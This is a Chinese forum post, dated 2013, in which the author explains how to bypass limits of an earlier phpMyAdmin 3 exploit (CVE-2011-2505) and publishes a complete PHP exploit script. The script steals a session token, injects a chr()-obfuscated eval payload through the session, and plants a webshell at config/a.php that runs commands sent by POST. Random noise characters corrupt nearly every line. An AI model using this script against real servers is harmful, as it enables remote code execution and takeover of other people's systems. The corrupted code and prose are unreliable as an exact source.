最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
: S( b, I9 S8 a2 Q. y3 L5 k, h9 U4 {" g5 q2 T4 |+ @% N
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。" K. O- X+ o3 H- Y# V3 U+ }
- Q. @4 y/ |: e, l# g/ `
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:/ G' ?; e8 y1 f. {% ?1 K% _: E
一是session.auto_start = 1;! i' L* R2 w V( ~* ]6 p' A
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
( B" D+ p. P6 V" E当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
" I# @' d n& ^6 @6 ?% E
0 s2 U. X. [2 ~6 r/ L1 ]3 J在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。7 u6 @! q; y% R- [
& z( u- E7 A; l B3 [9 Z$ q
于是写了这个php版本的exp,代码如下:
! a! d, f1 a# E& ?9 c o+ x" f$ N9 d9 U8 D: v: v+ M' V6 z
#!/usr/bin/php& p9 T4 U. u a! `% m
<?php
: @; `( ]2 v3 t {print_r('
/ l) q5 Q8 w; L1 B; n( F: h+---------------------------------------------------------------------------+
# b' d, t* O# n3 k/ vpma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
# k" V7 j" d# j8 }8 \- e4 Qby oldjun(www.oldjun.com)1 r; r1 Z3 V) S- O5 |, \ r7 ^
welcome to www.t00ls.net
. m1 b7 G3 A5 Q* @mail: oldjun@gmail.com# {' G. {" e( e- U/ F
Assigned CVE id: CVE-2011-2505
" s5 ^* t; s- ^1 {+---------------------------------------------------------------------------+" H0 o. d- N* Z8 w6 Z+ C
');6 J/ P2 ?# {! i3 r' d/ y1 Y
; v P/ q* @0 h s
/**' K5 J* Q: k% W$ l+ j, a& l
* working when the directory:"config" exists and is writeable.1 G' s4 @5 V0 T9 ~( t: M
**/2 I" e: b' F* z
0 {0 y; [2 B: h9 o4 [if ($argc < 3) {, h" x7 `' p1 j; s3 h
print_r('
! \6 L$ R5 N# s( }4 ~ L+---------------------------------------------------------------------------+# Y/ B0 q* Y2 p# c8 k: \
Usage: php '.$argv[0].' host path6 Z- j& U1 U j' B
host: target server (ip/hostname)
. n$ Z8 Q& w+ m/ }8 @% v2 Apath: path to pma3
# l0 r* G( n4 D5 |Example:
; o0 m6 g& n" Sphp '.$argv[0].' localhost /pma/
, t. Y; K4 ~0 Q! \! |: j+---------------------------------------------------------------------------+2 O+ v, g0 Q. P* u) [9 @9 m
');
# q+ ^: ]( j- M, [0 D) \5 B( L exit;) H4 {' u7 @( S
}
! _' G" b6 Z) g( J. e* i" C
7 k. i2 S4 b s; p$host = $argv[1];
# ]/ }4 l2 K. Q0 D+ A$path = $argv[2];8 v; X& J9 u/ [
% g3 P, ]' ` M7 ~! i5 t4 @8 M
/**
! |3 `/ \, x8 [$ K9 T * Try to determine if the directory:"config" exists' Y' |# p. R' i1 O) y. E
**/
' z1 n! o* `/ L* l- U1 _echo "[+] Try to determine if the directory:config exists....\n";
2 p1 v) P* F, o( c% g- ~$returnstr=php_request('config/');
" I! a" a5 ?9 Q- y, d; uif(strpos($returnstr,'404')){
, O1 c1 k' m, z- Q0 k exit("[-] Exploit Failed! The directory:config do not exists!\n");, j P* R8 W( l$ |
}& @/ S' g! u1 g; Z4 Q" E
" x$ h( L' P" x
/**3 o$ I. }2 E0 A' x7 O: ]
* Try to get token and sessionid
, ^( i9 n2 y' r3 F H- M3 G- N**/
1 J h6 A- {2 m! recho "[+] Try to get token and sessionid....\n";
$ a9 V! P. g7 _. l3 L$result=php_request('index.php');
2 E+ o2 U( T$ X/ u- @preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);6 Y1 I7 A/ J, H& q
$token=$resp[3];
3 J- K% J( j* H' L$sessionid=$resp[1];
0 F; `7 p2 q l, Qif($token && $sessionid){
' b u4 ?1 n. Y! H; m+ }( L# C v' s echo "[+] token token\n";
K- y l& {. U5 p a$ \ echo "[+] Session IDsessionid\n";
# L7 ]# F3 B; K- s4 W; X; s}else{
, H* o/ f" b) H( a exit("[-] Can't get token and Session ID,Exploit Failed!\n");( z+ |8 C% u1 E1 k* F" K
}
& K+ \6 {% l* F+ w# e# Q
6 L" @% D) n: s1 F4 N" ]1 c" m/**
: q- i$ w5 r/ U* z; h8 k$ ~ * Try to insert shell into session( N& a3 v& z/ {' O1 K: p4 P) F
**/
8 N) d7 q6 O# w7 [' d* G3 becho "[+] Try to insert shell into session....\n";
, y$ I4 o/ `- g% v yphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
: [+ x9 v/ {4 ]) m, Q3 b# X7 K- ? b. N& q1 ^
/**
' ?* l, @( Z" y- ?, I- D% I' D * Try to create webshell1 ]' l0 @- M. H+ {1 S
**/8 \; t9 e9 T1 q6 K' Q- m' Q
echo "[+] Try to create webshell....\n";
& s% N8 \7 I0 b. W( t, Aphp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
. ~* `1 F! J' o# D/**
7 y2 f# r- Q+ H$ a6 k * Try to check if the webshell was created successfully% y l7 |8 F9 r2 `9 a
**/1 t% r0 o5 S$ q% {( B6 m
echo "[+] Try to check if the webshell was created successfully....\n";
$ d# C! U: k; |2 q9 g9 X# \7 E$content=php_request('config/config.inc.php');# A( U% A! |6 Q$ b+ ~( p( v4 ?
if(strpos($content,'t00ls')){
" f* v4 D8 t S; {. s8 W. E echo "[+] Congratulations! Expoilt successfully....\n";
& I- q2 y' H5 Q8 e b* K echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
& l; K0 o; J0 B2 M1 f}else{
2 w i5 X9 H3 i, W% l- a3 g7 u exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");! l1 Y& ]( P$ ?1 P
}
1 M. `0 [+ [4 [- ]( W0 K \, y8 M2 b( ~
/ ~7 J* v/ D# V/ k7 U! v5 y" Hfunction php_request($url,$data='',$cookie=''){
8 D9 W7 P) `& ~' |% l) d& \ global $host, $path;
, ?1 x4 r% e# I; }" w
3 Q( X" Y3 x, l( O: v $method=$data?'POST':'GET';$ K8 L9 ^8 @4 |8 f
5 y# k/ y& g% w x: M9 N
$packet = $method." ".$path.$url." HTTP/1.1\r\n";
* A* \! e# Q! z0 h" X $packet .= "Accept: */*\r\n";& J7 V$ H% w5 L3 B! R
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";% L6 J4 o& v2 b5 {0 l
$packet .= "Host: $host\r\n";9 t8 `; t! L: j' o$ U: {
$packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
) A# `+ ~) S/ q2 ]: ]- h $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
/ }# O9 a% u# _ $packet .= $cookie?"Cookie: $cookie\r\n":"";4 E9 Y* [( i, Z- n/ t- j' g: p
$packet .= "Connection: Close\r\n\r\n";
6 _% Q/ O3 k2 K3 B" ^- X" S $packet .= $data?$data:"";
0 q- k8 Z, H9 c2 A/ e8 D
! ?* S. ~2 V% I/ X D/ f" c $fp = fsockopen(gethostbyname($host), 80);
1 j& f& e! w0 E+ T if (!$fp) {
- F8 i+ {. o+ A2 l3 a) G. B0 o echo 'No response from '.$host; die;0 r3 U- S* D) _/ ~7 r
}3 [+ b2 b+ m9 K5 s" }* a
fputs($fp, $packet);5 K7 |" i2 q! j7 c6 Y
% e( t# Z3 U9 K $resp = '';
3 [4 V, y/ H, v% u( Z. s, Z$ w+ j7 t& {0 O* N" G" w& C
while ($fp && !feof($fp))' R4 S% i5 }. | \* X! `
$resp .= fread($fp, 1024);+ h- D2 r' `! X8 e2 c
7 w/ L( G+ A0 A* J) X$ x2 | return $resp;
0 X0 @5 _: m: f; c& V}
9 I2 C* L% {6 \+ A u 5 M6 y; h5 y5 Q- n+ R9 r0 n/ g
?>
& o! v2 n$ J t* L: R2 k- X+ l. |
发表于 2013-2-21 09:13:03
收藏
支持
反对